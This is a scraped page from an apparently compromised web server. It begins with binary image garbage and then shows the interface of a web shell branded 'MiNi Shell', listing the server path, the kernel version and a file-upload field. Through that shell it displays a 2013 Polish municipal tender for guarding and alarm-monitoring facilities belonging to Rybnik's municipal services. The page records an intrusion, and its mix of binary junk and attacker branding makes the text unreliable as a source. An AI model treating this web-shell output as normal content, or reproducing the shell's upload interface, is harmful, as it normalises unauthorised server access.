JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131113/238973-N-2013.html

<p class="kh_header"><b>Rybnik: Zadanie nr 1 - Ochrona obiektów i mienia Rybnickich Służb Komunalnych w Rybniku
przy ul. Jankowickiej 41 B.
Zadanie nr 2 - Ochrona obiektów i mienia Rybnickich Służb Komunalnych w Rybniku przy ul. Mikołowskiej i ul. Gen. Hallera.
Zadanie nr 3 - Ochrona obiektów i mienia Rybnickich Służb Komunalnych w ramach monitoringu napadowego (7 lokalizacji)</b><br>
<b>Numer ogłoszenia: 238973 - 2013; data zamieszczenia: 13.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Rybnik - Rybnickie Służby Komunalne , ul. Jankowicka 41 B, 44-200 Rybnik, woj. śląskie, tel. 32 4329540, faks 32 4329550.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://rsk.rybnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1 - Ochrona obiektów i mienia Rybnickich Służb Komunalnych w Rybniku
przy ul. Jankowickiej 41 B.
Zadanie nr 2 - Ochrona obiektów i mienia Rybnickich Służb Komunalnych w Rybniku przy ul. Mikołowskiej i ul. Gen. Hallera.
Zadanie nr 3 - Ochrona obiektów i mienia Rybnickich Służb Komunalnych w ramach monitoringu napadowego (7 lokalizacji).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na trzy zadania:
Zadanie nr 1 - Przedmiotem zamówienia jest całodobowa ochrona obiektów i mienia od poniedziałku do niedzieli na dwóch portierniach w Rybnickich Służbach Komunalnych przy ul. Jankowickiej 41b w Rybniku.
Zadanie nr 2 - Przedmiotem zamówienia jest usługa ochrony obiektów i mienia Rybnickich Służb Komunalnych według potrzeb Zamawiającego, w dniach i godzinach przez niego wskazanych w zleceniu przesłanym za pośrednictwem faksu, poczty elektronicznej lub telefonicznie, znajdujących się przy: a) ul. Mikołowskiej 105 w Rybniku (hala, budynek, ogrodzony teren i znajdujące się tam mienie (materiały). Szacunkowa ilość godzin ochrony to 4 800 godzin. b) ul. Gen. Hallera w Rybniku (stróżówka, stragany, teren targowiska). Szacunkowa ilość godzin ochrony to 9000 godzin. Zamawiający zastrzega sobie prawo zmiany ilości godzin pomiędzy pkt a ) i b).
Zadanie nr 3 - Przedmiotem zamówienia jest usługa ochrony obiektów i mienia Rybnickich Służb Komunalnych, polegająca na całodobowym monitoringu wszystkich obiektów. Szczegóły dotyczące zamówienia zawarte w SIWz dostępnej na stronie Zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każde zadanie, na które składana jest oferta musi być zabezpieczone wadium
Zamawiający żąda wniesienia wadium w wysokości:
Zadanie nr 1 -   10 000,00 PLN brutto 
Zadanie nr 2 -       500,00 PLN brutto
Zadanie nr 3 -       500,00 PLN brutto
Wadium musi być wniesione najpóźniej przed terminem składania ofert. Oferta nie zabezpieczona akceptowaną formą wadium zostanie odrzucona.
Szczegóły dotyczące wadium zawarte w SIWZ dostępnej na stronie Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy posiadają aktualną koncesję MSWiA na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów, o których mowa w rozdziale V SIWZ  na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie Zamówienia może ubiegać się Wykonawca który: wykonał bądź wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie co najmniej dwie usługi
ochrony mienia każda o wartości minimum 310 000,00 zł brutto - dotyczy zadania nr 1. Wykonawca wykonał bądź wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie co najmniej dwie usługi ochrony mienia każda o wartości minimum 150 000,00 zł brutto - dotyczy zadania nr 2. Wykonawca wykonał bądź wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie co najmniej dwie usługi ochrony mienia poprzez monitorowanie każda o wartości minimum 15 000,00 zł brutto - dotyczy zadania nr 3. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów, o których mowa w rozdziale V SIWZ  na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy posiadają aktualną polisę ubezpieczeniową a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum: - 2 000 000,00 zł brutto - zadanie nr 1. - 2 000 000,00 zł brutto - zadanie nr 2 - 2 000 000,00 zł brutto - zadanie nr 3. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów, o których mowa w rozdziale V SIWZ  na zasadzie spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://rsk.rybnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Rybnik- Rybnickie Służby Komunalne Rybnik, ul. Jankowicka 41 B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2013 godzina 11:00, miejsce: Miasto Rybnik- Rybnickie Służby Komunalne Rybnik, ul. Jankowicka 41 B, pok. 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ochrona obiektów i mienia Rybnickich Służb Komunalnych w Rybniku przy ul. Jankowickiej 41 B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest całodobowa ochrona obiektów i mienia od poniedziałku do niedzieli na dwóch portierniach w Rybnickich Służbach Komunalnych przy ul. Jankowickiej 41b w Rybniku.
Wymagana ochrona przez całą dobę budynków i zaplecza wg  załączonego schematu:
- budynek socjalny z częścią magazynową nr 1, - budynek zaplecza technicznego nr 2, - budynek administracyjno - biurowo - techniczny nr 3, - budynek zaplecza technicznego nr 4, - budynek wiaty nr 5, - budynek archiwum zakładowego nr 6, -	magazyn soli- budynek nr 7, -	 teren ogrodzony, - plac materiałów drogowych - ogrodzony ( dzierżawa PKP ), - plac  materiałów drogowych - poza ogrodzeniem, -	środki transportowo - sprzętowe - teren zakładu, - stacja transformatorowa - teren zakładu, - parking strzeżony, - waga, - wiaty - teren zakładu ( pomiędzy budynkiem administracyjno - biurowo - technicznym  nr 3 a budynkiem zaplecza technicznego nr 2 ). Szczegóły dotyczące przedmiotu zamówienia zawarte w SIWZ dostępnej na stronie Zamawiajacego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ochrona obiektów i mienia Rybnickich Służb Komunalnych w Rybniku przy ul. Mikołowskiej i ul. Gen. Hallera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa ochrony obiektów i mienia Rybnickich Służb Komunalnych według potrzeb Zamawiającego, w dniach i godzinach przez niego wskazanych w zleceniu przesłanym za pośrednictwem faksu, poczty elektronicznej lub telefonicznie, znajdujących się przy: a) ul. Mikołowskiej 105 w Rybniku (hala, budynek, ogrodzony teren i znajdujące się tam mienie (materiały). Szacunkowa ilość godzin ochrony to 4 800 godzin. b) ul. Gen. Hallera w Rybniku (stróżówka, stragany, teren targowiska). Szacunkowa ilość godzin ochrony to 9000 godzin. 
Zamawiający zastrzega sobie prawo zmiany ilości godzin pomiędzy pkt a ) i b).
Zamawiający zastrzega sobie prawo zmiany ( zmniejszenia ) godzin ochrony w zależności od potrzeb Zamawiającego w trakcie trwania umowy. Szczegóły dotyczące przedmiotu zamówienia zawarte w SIWZ dostępnej na stronie Zamawiajacego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ochrona obiektów i mienia Rybnickich Służb Komunalnych w ramach monitoringu napadowego (7 lokalizacji).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa ochrony obiektów i mienia Rybnickich Służb Komunalnych, polegająca na całodobowym monitoringu wszystkich obiektów.
Miejsca dozorowania: a) budynek przy ul. Jankowickiej 41 B (baza RSK). 
Wymagania sprzętowe Wykonawcy: - podłączenie istniejącego alarmu do linii telefonicznej służącej do monitorowania budynku (wraz z ustawieniem i konfiguracją centralki alarmowej). b)	budynek archiwum znajdujący się na bazie Rybnickich Służb Komunalnych. Wymagania sprzętowe Wykonawcy: - montaż własnego modułu GSM do istniejącego alarmu znajdującego się w budynku (wraz z kartą wysyłającą dane o włamaniu, konfiguracja alarmu). c) budynek Biura Targowisk i Parkingów przy ul. Rzecznej 8. Wymagania sprzętowe Wykonawcy: - podłączenie istniejącego alarmu do linii telefonicznej służącej do monitorowania budynku (wraz z ustawieniem i konfiguracją centralki alarmowej) lub montaż własnego modułu GSM do alarmu znajdującego się w budynku (wraz z kartą wysyłającą dane o włamaniu, konfiguracja alarmu). d)	hala magazynowa przy ul. Mikołowskiej 105 (magazyn RSK)
Wymagania sprzętowe Wykonawcy: - montaż własnego modułu GSM do alarmu znajdującego się w budynku (wraz z kartą wysyłającą dane o włamaniu, konfiguracja alarmu). Montaż 6 szt. czujek dualnych, zewnętrznych montowanych na budynku magazynu (zasięg min. 23 m - daleki zasięg) i podłączenie do istniejącego alarmu lub zamontowanie drugiego alarmu + moduł GSM (+karta) w razie braku wejść w istniejącym alarmie. Miejsce zamontowania czujek wskaże Zamawiający (max. odległość 30 m od alarmu w istniejących korytkach). Wykonawca musi przewidzieć wszystkie elementy nie wymienione ale potrzebne do prawidłowego działania ww. systemu alarmowego. Dodatkowo Wykonawca raz na dobę dokona objazdu ww. obiektu. Zamawiający ustala godzinę objazdu (? 30 min.). Awaryjnie, Zamawiający może żądać telefonicznie, aby objazd ten nastąpił w obojętnie jakiej godzinie na dobę do 15 min. od zgłoszenia (nawet jakby objazd dobowy został już wykonany). e) Parking miejski znajdujący się przy ul. Skłodowskiej. Do ochrony należy pomieszczenie gospodarcze, 3 szt. - szlabany, 2 szt. moduły wjazdowe i 2 szt. wyjazdowy, 2 szt. automaty rozliczające wraz z zabudową (ogólnie wszystkie urządzenia systemu parkingowego znajdującego się na terenie parkingu). Wymagania sprzętowe Wykonawcy: - montaż własnego modułu GSM do istniejącego alarmu znajdującego się w budce (wraz z kartą wysyłającą dane o włamaniu, konfiguracja alarmu).
f) Parking miejski znajdujący się przy ul. 3-go Maja. Do ochrony należy budka parkingowa, 3 szt. - szlabany, 2 szt. moduły wjazdowe i 1 szt. moduł wyjazdowy, (ogólnie wszystkie urządzenia systemu parkingowego znajdujące się na terenie parkingu). Wykonawca, zobowiązany jest niezwłocznie po podpisaniu umowy zamontować alarm na ww. elementach. Okablowanie pod alarm (doprowadzenie kabla 4 x 0,5 x 2 do każdego urządzenia w gestii Zamawiającego). System alarmowy musi składać się z co najmniej jednej czujki alarmowej zamontowanej w budce parkingowej + jeden kontaktron zamontowany na drzwiach wejściowych, jednego kontaktronu zamontowanego w każdym szlabanie oraz dwóch kontaktronów zamontowanych w terminalach wjazdowym i wyjazdowym oraz pilota włączającego alarm (2 szt.).
Wykonawca musi wyposażyć alarm we własny moduł GSM (wraz z kartą wysyłającą dane o włamaniu, konfiguracja alarmu, piloty 2 szt., syrena). Wykonawca musi przewidzieć wszystkie elementy nie wymienione ale potrzebne do prawidłowego działania ww. systemu. g) Teren na ul. Kolberga (składowisko odpadów w Rybniku) gdzie znajdować się będą maszyny budowlane i drogowe (działka nr 887/19 1757/18892/19). Wykonawca zobowiązany jest niezwłocznie po podpisaniu umowy do wykonania alarmu, który składa się z  4 czujek dualnych, zewnętrznych montowanych na słupie (zasięg min. 23 m) oraz centralki alarmowej zamontowanej w zewnętrznej metalowej skrzynce na ww. słupie (+ modułu GSM + karta wysyłająca dane, podłączenie i konfiguracja alarmu, piloty 2 szt., syrena). Wykonawca musi przewidzieć wszystkie elementy nie wymienione ale potrzebne do prawidłowego działania ww. systemu alarmowego. Dodatkowo Wykonawca raz na dobę dokona objazdu ww. obiektu. Zamawiający ustala godzinę objazdu (? 30 min). Awaryjnie, Zamawiający może żądać telefonicznie, aby objazd ten nastąpił w obojętnie jakiej godzinie na dobę do 15 min. od zgłoszenia (nawet jakby objazd dobowy został już wykonany). Szczegóły dotyczące przedmiotu zamówienia zawarte w SIWZ dostępnej na stronie Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com